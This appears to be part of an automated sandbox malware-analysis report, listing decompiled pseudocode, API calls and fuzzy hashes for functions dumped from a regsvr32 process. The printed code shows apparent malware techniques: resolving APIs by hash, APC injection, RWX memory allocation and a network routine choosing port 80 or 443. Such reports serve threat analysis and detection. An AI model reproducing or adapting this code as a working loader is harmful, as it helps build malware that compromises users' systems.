							_t153 = _t153 + 1;
							_t112 = E00736644(_t168, _t170, _t246, _t229 + 0x30, _t221, _t233, _t238);
							_t124 = _t112;
							__eflags = _t112;
							if(_t112 == 0) {
								continue;
							}
							break;
						}
						__eflags = _t124 - 0x103;
						if(_t124 == 0x103) {
							 *0x73d438 = _t246;
							_t124 = 0;
							__eflags = 0;
						}
						E0073908C(0xbba3b4b6, _t168,  *((intOrPtr*)(_t250 + 0x20)));
						__eflags = _t168;
						if(_t168 != 0) {
							RegCloseKey(); // executed
						}
						__eflags = _t124;
						if(_t124 == 0) {
							goto L36;
						} else {
							goto L34;
						}
					}
				} else {
					E0073908C(0xc06f8334, _t168,  *((intOrPtr*)(_t221 + 0x18)));
					if(_t168 == _t244) {
						_t124 = 0x7f;
						L73:
						if(_t124 == r13d) {
							goto L76;
						}
						L74:
						E00736CE4(_t126, _t168, _t170, _t219, _t215, _t221);
						goto L76;
					}
					L17:
					_t94 =  *_t168();
					L72:
					_t124 = _t94;
					goto L73;
				}
			}















































                                0x007337e0
                                0x007337e0
                                0x007337e0
                                0x007337e0
                                0x007337e0
                                0x007337e0
                                0x007337e0
                                0x007337e5
                                0x007337f1
                                0x007337f8
                                0x007337ff
                                0x0073380c
                                0x00733817
                                0x00733824
                                0x0073382b
                                0x00733831
                                0x00733838
                                0x0073383d
                                0x00733840
                                0x00733845
                                0x00733850
                                0x00733858
                                0x00733866
                                0x0073385a
                                0x00733862
                                0x00733862
                                0x00733869
                                0x00733870
                                0x00733875
                                0x0073387a
                                0x0073387c
                                0x00733888
                                0x0073388d
                                0x00733892
                                0x00733894
                                0x007338a0
                                0x007338a5
                                0x007338aa
                                0x007338ac
                                0x007338b8
                                0x007338bd
                                0x007338bd
                                0x007338aa
                                0x00733892
                                0x0073387a
                                0x007338c2
                                0x00733cc0
                                0x00733cd5
                                0x00733cd5
                                0x007338d5
                                0x007338db
                                0x007338e1
                                0x00733cbb
                                0x00000000
                                0x00733cbb
                                0x007338e7
                                0x007338ef
                                0x007338fd
                                0x00733905
                                0x0073390b
                                0x0073390b
                                0x0073390d
                                0x0073390d
                                0x00733917
                                0x0073391a
                                0x00733921
                                0x00733928
                                0x0073392f
                                0x00733936
                                0x00733944
                                0x0073394c
                                0x0073395e
                                0x0073394e
                                0x0073394e
                                0x00733951
                                0x00733954
                                0x0073395a
                                0x0073395a
                                0x00733961
                                0x00733968
                                0x0073398e
                                0x00733997
                                0x007339a4
                                0x007339aa
                                0x007339ac
                                0x007339af
                                0x007339af
                                0x007339b3
                                0x007339b6
                                0x00733a8e
                                0x00733a93
                                0x00733a93
                                0x00733a96
                                0x00733a99
                                0x00000000
                                0x00000000
                                0x00733a9f
                                0x00733aa6
                                0x00733aa6
                                0x00733ab7
                                0x00733ac3
                                0x00733acb
                                0x00733ad6
                                0x00733adf
                                0x00733ae4
                                0x00733ae6
                                0x00733ae9
                                0x00733aeb
                                0x00733af3
                                0x00733b03
                                0x00733b03
                                0x00733b05
                                0x00733b08
                                0x00733b0e
                                0x00733b0e
                                0x00733b15
                                0x00733b1a
                                0x00733b1c
                                0x00733b1f
                                0x00733b24
                                0x00733b29
                                0x00733b2e
                                0x00733b32
                                0x00733b35
                                0x00733b37
                                0x00733b3b
                                0x00733b40
                                0x00733b43
                                0x00733b47
                                0x00733b47
                                0x00733b35
                                0x00733b4b
                                0x00733b4e
                                0x00733b57
                                0x00733b5c
                                0x00733b5f
                                0x00733b6b
                                0x00733b70
                                0x00733b78
                                0x00733b83
                                0x00733b8c
                                0x00733b96
                                0x00733b99
                                0x00733baf
                                0x00733b9b
                                0x00733b9b
                                0x00733ba0
                                0x00733ba3
                                0x00733ba8
                                0x00733ba8
                                0x00733ba3
                                0x00733bb2
                                0x00733bb5
                                0x00733bc1
                                0x00733bce
                                0x00733bd3
                                0x00733bd6
                                0x00000000
                                0x00000000
                                0x00733bd8
                                0x00733be5
                                0x00733bec
                                0x00733bf1
                                0x00733bf4
                                0x00733bfc
                                0x00733bf6
                                0x00733bf6
                                0x00733bf8
                                0x00733bf8
                                0x00733bff
                                0x00733c07
                                0x00733c9d
                                0x00733ca5
                                0x00000000
                                0x00733c0d
                                0x00733c16
                                0x00733c1b
                                0x00733c1e
                                0x00733c26
                                0x00733c20
                                0x00733c22
                                0x00733c22
                                0x00733c32
                                0x00733c37
                                0x00733c3a
                                0x00733c4b
                                0x00733c3c
                                0x00733c3e
                                0x00733c41
                                0x00733c41
                                0x00733c44
                                0x00733c46
                                0x00733c46
                                0x00733c4e
                                0x00733c52
                                0x00733c55
                                0x00733c74
                                0x00733c79
                                0x00733c7c
                                0x00733c8f
                                0x00733c7e
                                0x00733c88
                                0x00733c8b
                                0x00733c8b
                                0x00733c92
                                0x00733c95
                                0x00000000
                                0x00733c97
                                0x00733c97
                                0x00000000
                                0x00733c97
                                0x00733c57
                                0x00733c57
                                0x00733c5c
                                0x00733c61
                                0x00733c64
                                0x00000000
                                0x00000000
                                0x00733c6a
                                0x00000000
                                0x00733c6a
                                0x00733c55
                                0x00733bb7
                                0x00733bb7
                                0x00733bb7
                                0x00000000
                                0x00733bb7
                                0x00733bb5
                                0x00733b61
                                0x00733b61
                                0x00733b4e
                                0x00000000
                                0x00733b08
                                0x007339bc
                                0x007339c8
                                0x007339cd
                                0x007339d0
                                0x007339fb
                                0x007339d2
                                0x007339de
                                0x007339e6
                                0x007339f5
                                0x007339f7
                                0x007339f7
                                0x007339fe
                                0x00733a00
                                0x00733a7e
                                0x00733a86
                                0x00000000
                                0x00733a02
                                0x00733a02
                                0x00733a0b
                                0x00733a10
                                0x00733a13
                                0x00733a30
                                0x00733a15
                                0x00733a1d
                                0x00733a22
                                0x00733a2a
                                0x00733a2c
                                0x00733a2c
                                0x00733a33
                                0x00733a35
                                0x00000000
                                0x00000000
                                0x00733a37
                                0x00733a3f
                                0x00733a41
                                0x00733a46
                                0x00733a48
                                0x00733a4a
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00733a4a
                                0x00733a4c
                                0x00733a52
                                0x00733a54
                                0x00733a5b
                                0x00733a5b
                                0x00733a5b
                                0x00733a66
                                0x00733a6b
                                0x00733a6e
                                0x00733a78
                                0x00733a78
                                0x00733a7a
                                0x00733a7c
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00733a7c
                                0x0073396a
                                0x00733973
                                0x0073397b
                                0x00733984
                                0x00733cac
                                0x00733caf
                                0x00000000
                                0x00000000
                                0x00733cb1
                                0x00733cb4
                                0x00000000
                                0x00733cb4
                                0x0073397d
                                0x0073397d
                                0x00733caa
                                0x00733caa
                                0x00000000
                                0x00733caa

                                APIs
                                • GetModuleHandleA.KERNEL32 ref: 0073382B
                                  • Part of subcall function 007340F8: HeapAlloc.KERNEL32 ref: 00734177
                                • HeapAlloc.KERNEL32 ref: 007338D5
                                  • Part of subcall function 0073908C: SetLastError.KERNEL32 ref: 007390C8
                                • HeapAlloc.KERNEL32 ref: 007339A4
                                • RegOpenKeyW.ADVAPI32 ref: 007339F5
                                • RegEnumKeyW.ADVAPI32 ref: 00733A2A
                                • RegCloseKey.KERNELBASE ref: 00733A78
                                • HeapFree.KERNEL32 ref: 00733A86
                                • QueueUserAPC.KERNELBASE ref: 00733C8B
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$Alloc$CloseEnumErrorFreeHandleLastModuleOpenQueueUser
                                • String ID:
                                • API String ID: 3014043065-0
                                • Opcode ID: 9dbcaf920dd6102fce91019f499f3125efbb6cbe76309c74a1881d9469c61bfb
                                • Instruction ID: ccc663f07ceae9093a48b59e4a48f6a4b4509beec84c5c93e459ca307280f2bb
                                • Opcode Fuzzy Hash: 9dbcaf920dd6102fce91019f499f3125efbb6cbe76309c74a1881d9469c61bfb
                                • Instruction Fuzzy Hash: D1C10365704781D6FE34EB62E4883AAA361F788788F504412DF8E47753DF7CEA998311
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 007331C0 Relevance: 3.9, APIs: 3, Instructions: 195memoryCOMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 15%
                                			E007331C0(void* __ebx, void* __ecx, void* __eflags, long long __rbx, intOrPtr* __rcx, long long* __rdx, void* __r8, void* __r9) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				signed int _t70;
				signed int _t78;
				signed int _t81;
				signed short _t104;
				void* _t108;
				long long* _t127;
				long long _t128;
				void* _t156;
				intOrPtr* _t159;
				void* _t164;
				long long* _t165;
				long long* _t167;
				void* _t168;
				void* _t169;
				long long* _t172;
				long long* _t173;
				long long* _t183;
				void* _t187;
				void* _t190;
				intOrPtr _t191;

				_t128 = __rbx;
				 *((long long*)(_t168 + 0x10)) = __rbx;
				 *((intOrPtr*)(_t168 + 0x20)) = r9d;
				 *(_t168 + 0x18) = r8d;
				_push(_t164);
				_t169 = _t168 - 0x50;
				_t188 =  *0x73d458;
				_t162 =  *__rcx;
				_t191 =  *0x73d448;
				_t127 = __rdx;
				_t159 = __rcx;
				E00736C34(__ebx, __rbx, __rdx, __rcx,  *__rcx, _t164, __r8, _t190, _t187);
				_t81 = 0;
				_t165 = _t127;
				if(_t127 == _t128) {
					L36:
					E0073908C(0xc06f8334, _t127,  *((intOrPtr*)(_t188 + 0x18)));
					if(_t127 == _t128) {
						_t81 = 0x7f;
					} else {
						_t81 =  *_t127();
					}
					L39:
					return _t81;
				}
				_t108 =  *((char*)(_t159 + 0x75)) - 6;
				_t6 = _t128 + 4; // 0x4
				r12d = _t6;
				if(_t108 > 0 || _t108 == 0 &&  *((char*)(_t159 + 0x74)) > 2) {
					 *((intOrPtr*)(_t169 + 0x90)) = r12d;
				} else {
					 *((intOrPtr*)(_t169 + 0x90)) = _t81;
				}
				E0073908C(0x3fe3c8ba, _t127,  *((intOrPtr*)(_t162 + 0x48)));
				if(_t127 == _t128) {
					_t127 = _t128;
				} else {
					r9d = 0;
					r8d = 0;
					 *((intOrPtr*)(_t169 + 0x20)) = _t81;
					 *_t127(); // executed
				}
				_t172 = _t165;
				 *((long long*)(_t159 + 0x28)) = _t127;
				HeapFree(??, ??, ??);
				if( *((intOrPtr*)(_t159 + 0x28)) == _t128) {
					goto L36;
				} else {
					if( *((intOrPtr*)(_t169 + 0xa0)) == _t81) {
						L15:
						E00736C34(_t81, _t128,  *((intOrPtr*)(_t159 + 8)), _t159, _t162, _t165, _t172);
						_t183 = _t127;
						if(_t127 == _t128) {
							goto L36;
						}
						 *((intOrPtr*)(_t169 + 0x90)) = 0x100;
						if( *((intOrPtr*)(_t169 + 0xb0)) == _t81) {
							_t104 = 0x50;
						} else {
							 *((intOrPtr*)(_t169 + 0x40)) = 0xaa0;
							E0073908C(0xe7f09937, _t127,  *((intOrPtr*)(_t162 + 0x48)));
							if(_t127 != _t128) {
								r9d = 4;
								 *_t127();
							}
							asm("bts dword [esp+0x90], 0x17");
							_t104 = 0x1bb;
						}
						E0073908C(0x7dda0345, _t127,  *((intOrPtr*)(_t162 + 0x48)));
						if(_t127 == _t128) {
							_t127 = _t128;
						} else {
							r9d = 0;
							r8d = _t104 & 0x0000ffff;
							 *_t127();
						}
						_t173 = _t183;
						 *((long long*)(_t159 + 0x30)) = _t127;
						HeapFree(??, ??, ??);
						if( *((intOrPtr*)(_t159 + 0x30)) == _t128) {
							goto L36;
						} else {
							E00736C34(_t81, _t128,  *((intOrPtr*)(_t159 + 0x10)), _t159, _t162, _t165, _t173);
							_t167 = _t127;
							if(_t127 == _t128) {
								goto L36;
							}
							E0073908C(0xaa9d9fc1, _t127,  *((intOrPtr*)(_t162 + 0x48)));
							if(_t127 == _t128) {
								_t127 = _t128;
							} else {
								_t156 =  !=  ? _t191 + 0x741250 : _t191 + 0x741268;
								r9d = 0;
								 *((intOrPtr*)(_t169 + 0x30)) =  *((intOrPtr*)(_t169 + 0x90));
								 *((long long*)(_t169 + 0x28)) = _t128;
								 *((long long*)(_t169 + 0x20)) = _t128;
								 *_t127(); // executed
							}
							 *((long long*)(_t159 + 0x38)) = _t127;
							HeapFree(??, ??, ??);
							if( *((intOrPtr*)(_t159 + 0x38)) == _t128) {
								goto L36;
							} else {
								 *((intOrPtr*)(_t169 + 0x44)) = 4;
								E0073908C(0x677ec78c, _t127,  *((intOrPtr*)(_t162 + 0x48)));
								_t48 = _t167 + 0x1b; // 0x1f
								r12d = _t48;
								if(_t127 == _t128) {
									_t70 = _t81;
								} else {
									_t70 =  *_t127();
								}
								if(_t70 != _t81) {
									asm("bts dword [esp+0x90], 0x8");
									E0073908C(0xe7f09937, _t127,  *((intOrPtr*)(_t162 + 0x48)));
									if(_t127 != _t128) {
										r9d = 4;
										 *_t127();
									}
								}
								goto L39;
							}
						}
					}
					E0073908C(0xe7f09937, _t127,  *((intOrPtr*)(_t162 + 0x48)));
					if(_t127 == _t128) {
						_t78 = _t81;
					} else {
						_t18 = _t169 + 0xa0; // -14
						_t172 = _t18;
						r9d = r12d;
						_t78 =  *_t127();
					}
					if(_t78 == _t81) {
						goto L36;
					} else {
						goto L15;
					}
				}
			}


























                                0x007331c0
                                0x007331c0
                                0x007331c5
                                0x007331ca
                                0x007331cf
                                0x007331da
                                0x007331de
                                0x007331e5
                                0x007331e8
                                0x007331f3
                                0x007331f6
                                0x007331fe
                                0x00733203
                                0x00733205
                                0x0073320b
                                0x00733469
                                0x00733472
                                0x0073347a
                                0x00733482
                                0x0073347c
                                0x0073347e
                                0x0073347e
                                0x00733487
                                0x007334a0
                                0x007334a0
                                0x00733211
                                0x00733215
                                0x00733215
                                0x00733219
                                0x0073322c
                                0x00733223
                                0x00733223
                                0x00733223
                                0x0073323d
                                0x00733245
                                0x0073325f
                                0x00733247
                                0x0073324e
                                0x00733251
                                0x00733257
                                0x0073325b
                                0x0073325b
                                0x00733262
                                0x0073326a
                                0x0073326e
                                0x00733278
                                0x00000000
                                0x0073327e
                                0x0073328a
                                0x007332be
                                0x007332c4
                                0x007332c9
                                0x007332cf
                                0x00000000
                                0x00000000
                                0x007332d5
                                0x007332e7
                                0x00733326
                                0x007332e9
                                0x007332ef
                                0x007332f7
                                0x007332ff
                                0x00733305
                                0x00733314
                                0x00733314
                                0x00733316
                                0x0073331f
                                0x0073331f
                                0x00733334
                                0x0073333c
                                0x00733350
                                0x0073333e
                                0x00733342
                                0x00733345
                                0x0073334c
                                0x0073334c
                                0x00733353
                                0x0073335b
                                0x0073335f
                                0x00733369
                                0x00000000
                                0x0073336f
                                0x00733375
                                0x0073337a
                                0x00733380
                                0x00000000
                                0x00000000
                                0x0073338f
                                0x00733397
                                0x007333de
                                0x00733399
                                0x007333ba
                                0x007333c5
                                0x007333c8
                                0x007333d0
                                0x007333d5
                                0x007333da
                                0x007333da
                                0x007333e9
                                0x007333ed
                                0x007333f7
                                0x00000000
                                0x007333f9
                                0x00733403
                                0x0073340b
                                0x00733410
                                0x00733410
                                0x00733417
                                0x00733431
                                0x00733419
                                0x0073342d
                                0x0073342d
                                0x00733435
                                0x00733437
                                0x00733449
                                0x00733451
                                0x0073345f
                                0x00733465
                                0x00733465
                                0x00733451
                                0x00000000
                                0x00733435
                                0x007333f7
                                0x00733369
                                0x00733292
                                0x0073329a
                                0x007332b4
                                0x0073329c
                                0x007332a0
                                0x007332a0
                                0x007332a8
                                0x007332b0
                                0x007332b0
                                0x007332b8
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x007332b8

                                APIs
                                  • Part of subcall function 00736C34: HeapAlloc.KERNEL32 ref: 00736C8F
                                • HeapFree.KERNEL32 ref: 0073326E
                                • HeapFree.KERNEL32 ref: 0073335F
                                • HeapFree.KERNEL32 ref: 007333ED
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$Free$Alloc
                                • String ID:
                                • API String ID: 3901518246-0
                                • Opcode ID: bb3dd621c95c53055fcba926f55aa16ae10003733876a93a6dfeee260ac781c3
                                • Instruction ID: ea1a35c35bdcff21396895b809089af42d5f6bc3e8914cafb346401feb957e76
                                • Opcode Fuzzy Hash: bb3dd621c95c53055fcba926f55aa16ae10003733876a93a6dfeee260ac781c3
                                • Instruction Fuzzy Hash: 577188627086C4D6EB30DFA2E54476AA3A1F7C8B84F48442A9F4E47B06CF7CD6A5C710
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0073A0AC Relevance: 3.1, APIs: 2, Instructions: 105filenativeCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0073908C: SetLastError.KERNEL32 ref: 007390C8
                                • CreateFileW.KERNELBASE ref: 0073A10E
                                • NtQueryDirectoryFile.NTDLL ref: 0073A1A5
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: File$CreateDirectoryErrorLastQuery
                                • String ID:
                                • API String ID: 2967190759-0
                                • Opcode ID: f814dd8b6d3da2fcbfd4e7d7d81ec7b5df8dd2866cc2a168341a68cf2791420f
                                • Instruction ID: 8fec7255669c6b8031d2958a8ed9f48852ad5c396a9c77c11ed5cc23f3175e61
                                • Opcode Fuzzy Hash: f814dd8b6d3da2fcbfd4e7d7d81ec7b5df8dd2866cc2a168341a68cf2791420f
                                • Instruction Fuzzy Hash: 3241DD723087849AEB248B52E88532AA3A0F7CC7D0F184525EF9D43B8ACF3CD945C711
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00739D6C Relevance: 1.5, APIs: 1, Instructions: 210memoryCOMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 67%
                                			E00739D6C(void* __ebx, void* __ecx, void* __edx, signed int __esi, long long __rbx, long long __rcx, void* __r8, void* __r9, intOrPtr* __r10, void* __r11, void* _a8, signed int _a16, char _a24, char _a32) {
				void* _v48;
				intOrPtr _v56;
				signed long long* _v64;
				signed long long _v72;
				char _v80;
				char _v88;
				long long _v96;
				signed long long _v104;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t68;
				signed int _t71;
				void* _t72;
				void* _t79;
				signed int _t91;
				void* _t97;
				signed int _t99;
				void* _t116;
				signed int _t117;
				signed int _t119;
				signed int _t120;
				long long _t147;
				signed long long _t148;
				long long _t151;
				void* _t155;
				void* _t185;
				long long _t187;
				void* _t190;
				long long _t192;
				signed short* _t196;
				signed int* _t198;
				char* _t203;
				void* _t217;
				void* _t218;
				void* _t220;
				intOrPtr _t221;

				_t217 = __r11;
				_t216 = __r10;
				_t119 = __esi;
				_t97 = __ebx;
				_t147 = _t192;
				 *((long long*)(_t147 + 8)) = __rbx;
				_push(_t190);
				_push(_t187);
				_push(_t185);
				_t221 =  *0x73d458;
				r12d =  *0x73d450;
				 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0x00000000;
				_t151 = __rcx;
				_t155 = _t147 - 0x40;
				_t68 = E007388C8(__ecx, __rcx, _t155, _t185, _t187, _t190, __r10, _t220, _t218); // executed
				_t116 = _t68;
				if(_t68 != 0) {
					L39:
					asm("lock inc ecx");
					return _t116;
				} else {
					_t196 =  *((intOrPtr*)(_t151 + 0x40));
					r9d = _t196[1] & 0x0000ffff;
					_t99 =  *_t196 & 0x0000ffff;
					_t71 = r12d ^ 0xe49a1e6d;
					if(_t155 <= __r9 + 8) {
						_t119 = 0;
						__eflags = 0;
					} else {
						_t187 = __r9 +  &(_t196[4]);
						if(_t71 != 0) {
							E00734D70(_t71, _t187);
							_t187 = _t147;
						}
					}
					_t124 = _t187;
					if(_t187 == 0) {
						L38:
						L0073A568();
						goto L39;
					}
					_t181 = _v64;
					_t13 = _t151 + 0xc0; // 0xc0
					_v96 = _t187;
					_v104 = _v104 & 0x00000000;
					_t72 = E007384E8(_t99, _t124, _t147, _t151, _t13, _v64, _t187, _t190,  *((intOrPtr*)(_t151 + 0x30)),  *((intOrPtr*)(_t151 + 0x38)));
					_t116 = _t72;
					if(_t72 != 0) {
						goto L38;
					}
					_t148 =  *((intOrPtr*)(_t151 + 0x28));
					_t198 =  &_v80;
					_v72 = _t148;
					if(E007391C8(_t99, r12d ^ 0x61f25585, _t148, _t151, _t187, _t181, _t185, _t187, _t198,  &_a24, _t217) != 0) {
						L10:
						_t117 = 0;
						__eflags = 0;
						_a16 = 0;
						L11:
						E0073908C(0xab05e147, _t148,  *((intOrPtr*)(_t221 + 0x18)));
						if(_t148 == 0) {
							_t116 = 0x7f;
						} else {
							r8d = 0;
							_t181 =  &_v72;
							_t27 = _t198 + 1; // 0x1
							_t99 = _t27;
							r9d = _t117 * 0x3e8;
							_t116 =  *_t148();
						}
						if(_t116 == 0x102) {
							 *(_t151 + 0x64) = 0x3e8;
							if(E007391C8(_t99, r12d ^ 0x64d094d6, _t148, _t151, _t187, _t181, _t185, _t187,  &_v80,  &_a24, _t217) == 0) {
								_v104 = _v104 & 0x00000000;
								_t181 = 0x7334a4;
								r9d = 0;
								E007314B8(_t97, _t99, _t148, _t151, _t151, 0x7334a4, _t187, _v80,  &_a24);
							}
							if(E007391C8(_t99, r12d ^ 0xdd4632ba, _t148, _t151, _t187, _t181, _t185, _t187,  &_v80,  &_a24, _t217) == 0 && E0073672C(_v80, _t181,  &_a16) != 0) {
								_t91 = _a16;
								if(_t91 != 0) {
									 *(_t151 + 0x64) = _t91 * 0x3e8;
								}
							}
							if(E007391C8(_t99, r12d ^ 0x705ce798, _t148, _t151, _t187, _t181, _t185, _t187,  &_v80,  &_a24, _t217) != 0 || E0073672C(_v80, _t181,  &_a16) == 0) {
								_t120 = 0;
								__eflags = 0;
								_a16 = 0;
							} else {
								_t120 = _a16;
							}
							r12d = r12d ^ 0xe5c7ba87;
							_t215 =  &_a24;
							_t110 = r12d;
							if(E007391C8(_t99, r12d, _t148, _t151, _t187, _t181, _t185, _t187,  &_v80,  &_a24, _t217) == 0) {
								_t110 = 0;
								if(E0073672C(_v80, _t181,  &_a32) != 0) {
									_t110 = 0x9c66d81c;
									E0073908C(0x9c66d81c, _t148,  *((intOrPtr*)(_t221 + 0x18)));
									if(_t148 != 0) {
										 *_t148();
									}
									 *((intOrPtr*)(_t151 + 0x60)) = _a32;
									 *((long long*)(_t151 + 0x58)) = _t148 * 0x23c34600 + _v56;
								}
							}
							do {
								_t203 =  &_v88;
								_t79 = E00732DC4(_t97, _t110, _t120, _t151,  &_v48, _t203, _t215); // executed
								if(_t79 == 0) {
									r8d = _v88;
									E00737258(_t119, _t151, _t151, _v48, _t216);
								}
								_t110 = 0xab05e147;
								E0073908C(0xab05e147, _t148,  *((intOrPtr*)(_t221 + 0x18)));
								if(_t148 == 0) {
									_t116 = 0x7f;
								} else {
									r8d = 0;
									r9d = _t120;
									_t63 = _t203 + 1; // 0x1
									_t99 = _t63;
									r9d = r9d * 0x3e8;
									_t116 =  *_t148();
								}
							} while (_t116 != 0);
							_t189 =  *((intOrPtr*)(_t151 + 0x50));
							if( *((intOrPtr*)(_t151 + 0x50)) != 0) {
								E00732874(_t97, _t99,  *((intOrPtr*)( *0x73d458 + 8)), _t189, _t185, _t189);
								HeapFree(??, ??, ??);
							}
						}
						goto L38;
					}
					_t198 =  &_a16;
					if(E0073672C(_v80, _t181, _t198) == 0) {
						goto L10;
					} else {
						_t117 = _a16;
						goto L11;
					}
				}
			}








































                                0x00739d6c
                                0x00739d6c
                                0x00739d6c
                                0x00739d6c
                                0x00739d6c
                                0x00739d6f
                                0x00739d73
                                0x00739d74
                                0x00739d75
                                0x00739d7e
                                0x00739d85
                                0x00739d8c
                                0x00739d90
                                0x00739d93
                                0x00739d97
                                0x00739d9c
                                0x00739da0
                                0x0073a08e
                                0x0073a08e
                                0x0073a0a9
                                0x00739da6
                                0x00739da6
                                0x00739dad
                                0x00739db2
                                0x00739db6
                                0x00739dc2
                                0x00739ddc
                                0x00739ddc
                                0x00739dc4
                                0x00739dc4
                                0x00739dcb
                                0x00739dd2
                                0x00739dd7
                                0x00739dd7
                                0x00739dcb
                                0x00739dde
                                0x00739de1
                                0x0073a084
                                0x0073a089
                                0x00000000
                                0x0073a089
                                0x00739def
                                0x00739df4
                                0x00739dfb
                                0x00739e00
                                0x00739e05
                                0x00739e0a
                                0x00739e0e
                                0x00000000
                                0x00000000
                                0x00739e14
                                0x00739e23
                                0x00739e31
                                0x00739e3d
                                0x00739e60
                                0x00739e60
                                0x00739e60
                                0x00739e62
                                0x00739e69
                                0x00739e72
                                0x00739e7a
                                0x00739e97
                                0x00739e7c
                                0x00739e7c
                                0x00739e85
                                0x00739e8a
                                0x00739e8a
                                0x00739e8e
                                0x00739e93
                                0x00739e93
                                0x00739ea2
                                0x00739ec1
                                0x00739ecf
                                0x00739ed6
                                0x00739edc
                                0x00739ee3
                                0x00739ee9
                                0x00739ee9
                                0x00739f0e
                                0x00739f28
                                0x00739f31
                                0x00739f39
                                0x00739f39
                                0x00739f31
                                0x00739f5c
                                0x00739f7f
                                0x00739f7f
                                0x00739f81
                                0x00739f76
                                0x00739f76
                                0x00739f76
                                0x00739f88
                                0x00739f8f
                                0x00739f9c
                                0x00739fa9
                                0x00739fb8
                                0x00739fc1
                                0x00739fc7
                                0x00739fcc
                                0x00739fd4
                                0x00739fdb
                                0x00739fdb
                                0x00739fe7
                                0x00739ff6
                                0x00739ff6
                                0x00739fc1
                                0x00739ffa
                                0x00739ffa
                                0x0073a007
                                0x0073a00e
                                0x0073a010
                                0x0073a01d
                                0x0073a01d
                                0x0073a026
                                0x0073a02b
                                0x0073a033
                                0x0073a051
                                0x0073a035
                                0x0073a035
                                0x0073a038
                                0x0073a040
                                0x0073a040
                                0x0073a044
                                0x0073a04d
                                0x0073a04d
                                0x0073a056
                                0x0073a05a
                                0x0073a061
                                0x0073a071
                                0x0073a07e
                                0x0073a07e
                                0x0073a061
                                0x00000000
                                0x00739ea2
                                0x00739e44
                                0x00739e55
                                0x00000000
                                0x00739e57
                                0x00739e57
                                0x00000000
                                0x00739e57
                                0x00739e55

                                APIs
                                  • Part of subcall function 007388C8: HeapAlloc.KERNEL32 ref: 00738910
                                  • Part of subcall function 007388C8: HeapAlloc.KERNEL32 ref: 00738956
                                • HeapFree.KERNEL32 ref: 0073A07E
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$Alloc$Free
                                • String ID:
                                • API String ID: 1549400367-0
                                • Opcode ID: 8cda5ef62eee2583e1016891d8b3408c524cec5b4a551b585b2903ac7aa30cdf
                                • Instruction ID: 8ab0dde5a333ff357a7e880d8937a93a0f40a52dc3a3d75a7ce1e5954519cda4
                                • Opcode Fuzzy Hash: 8cda5ef62eee2583e1016891d8b3408c524cec5b4a551b585b2903ac7aa30cdf
                                • Instruction Fuzzy Hash: AA81C06230478682FB64DF62E44539EA766F7C5B94F444012EE8E87B1AEF7CC946C740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130E6D50 Relevance: 1.4, APIs: 1, Instructions: 190memoryCOMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 63%
                                			E00007FFC7FFC130E6D50(void* __ecx, void* __rax, long long __rcx, signed int __rdx, signed int __rsi, void* __r8) {
				void* __rbx;
				void* __r13;
				void* _t105;
				signed int _t112;
				signed int _t127;
				signed int _t133;
				signed int _t134;
				signed int _t142;
				signed int _t147;
				long long _t149;
				signed long long _t151;
				signed long long _t152;
				signed long long _t153;
				signed int _t158;
				signed long long _t159;
				signed int _t166;
				void* _t169;
				signed long long _t173;
				signed long long _t179;
				signed long long _t181;
				signed long long _t186;
				signed long long _t188;
				signed long long _t192;
				signed long long _t196;
				void* _t200;
				void* _t201;
				void* _t205;
				signed int* _t206;
				void* _t207;
				void* _t210;
				long _t212;
				void* _t215;

				_t203 = __r8;
				 *((long long*)(_t200 + 0x10)) = __rdx;
				 *((long long*)(_t200 + 8)) = __rcx;
				_push(_t210);
				_t201 = _t200 - 0x90;
				_t147 =  *(_t201 + 0x100);
				_t158 = __rcx + 0x114f;
				_t196 =  *(_t201 + 0x130);
				_t166 =  *(_t201 + 0x110);
				r11d = r9d;
				_t186 =  *(_t201 + 0xf0);
				r10d = _t147 - 0x16de;
				 *(_t201 + 0xe8) = _t158;
				r13d = _t147 - 0x37e1;
				 *(_t201 + 0x130) = r10d;
				r15d = _t186 - 0x23f6;
				 *(_t201 + 0x80) = _t196 + 0x17b;
				r8d = _t215 + 0x3a59;
				r12d = _t166 - 0x165d;
				 *(_t201 + 0x100) = r12d;
				r9d = _t166 - 0x1351;
				if (_t105 - r8d >= 0) goto 0x130e6e2c;
				_t149 =  *((intOrPtr*)(__rdx + 0xd0));
				r8d = 0x3000;
				r9d = 0x40;
				_t179 =  *((intOrPtr*)(_t149 + 0x50)) + 0x00000fff & 0xfffff000;
				 *(__rdx + 0x190) = _t127;
				VirtualAlloc(_t215, _t212); // executed
				 *((long long*)(__rdx + 0xc0)) = _t149;
				goto 0x130e710b;
				r10d =  *__rdx;
				_t159 = _t158 - 0x38e9;
				r8d =  *(__rdx + 0x140);
				r10d = r10d | _t127;
				r8d = r8d +  *(__rdx + 0x1b0);
